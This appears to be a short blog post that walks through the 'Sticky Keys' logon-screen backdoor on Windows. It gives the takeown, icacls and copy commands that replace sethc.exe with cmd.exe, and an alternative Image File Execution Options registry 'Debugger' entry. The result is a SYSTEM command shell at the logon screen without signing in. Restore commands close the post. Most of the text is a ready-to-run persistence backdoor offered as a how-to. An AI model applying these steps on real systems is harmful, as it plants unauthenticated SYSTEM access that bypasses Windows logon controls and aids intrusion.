Nov 07

The Ultimate Movie Hacking Tool – Command Shell at Windows Logon Screen (via “StickyKeys”)

How many times have you seen a movie where the “hacker” connects to a system with a logon screen, hits a couple of keys, and gets a command shell. Here’s how this can be done for real in Windows.

The issue is that the Windows Ease of Use tools are accessible at the logon screen. Replacing the valid command(s) with a copy of cmd.exe provides a hidden command shell when pressing the right key combo (for example, pressing shift over and over again for “sticky keys”).

Here’s how to “hack the Windows logon screen” using an existing logged in privileged account.

Open a command prompt in Windows as an administrator and run the following commands:

cd windows\system32

icacls c:\windows\system32\sethc.exe /save c:\windows\system32\sethc.ACLFile /T
takeown /f sethc.exe
icacls sethc.exe /grant administrators:f

icacls c:\windows\system32\cmd.exe /save c:\windows\system32\cmd.ACLFile /T
takeown /f cmd.exe
icacls cmd.exe /grant administrators:f

copy c:\windows\system32\sethc.exe c:\windows\system32\sethcexe.BAK
copy c:\windows\system32\cmd.exe c:\windows\system32\sethc.exe

Note that this can also be set via a registry enttry:

Open Regedit and browse to:  HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
Create a new key called “sethc.exe”
Under this new key, create a new string value (REG_SZ) and call it “Debugger”
Modify this value to be “C:\windows\system32\cmd.exe”

Note that the winlogon process will kill the cmd window invoked through this method after a short amount of time.

You can now open the command prompt by pressing the Shift key about 5 to 10 times at the logon screen to open command prompt as SYSTEM.

To restore the files and permissions, open a command window as administrator and run the following:

copy c:\windows\system32\sethcexe.BAK c:\windows\system32\sethc.exe

icacls c:\windows\system32\sethc.exe /restore c:\windows\system32\sethc.ACLFile /T

icacls c:\windows\system32\cmd.exe /restore c:\windows\system32\cmd.ACLFile /T


(Visited 1,163 times, 1 visits today)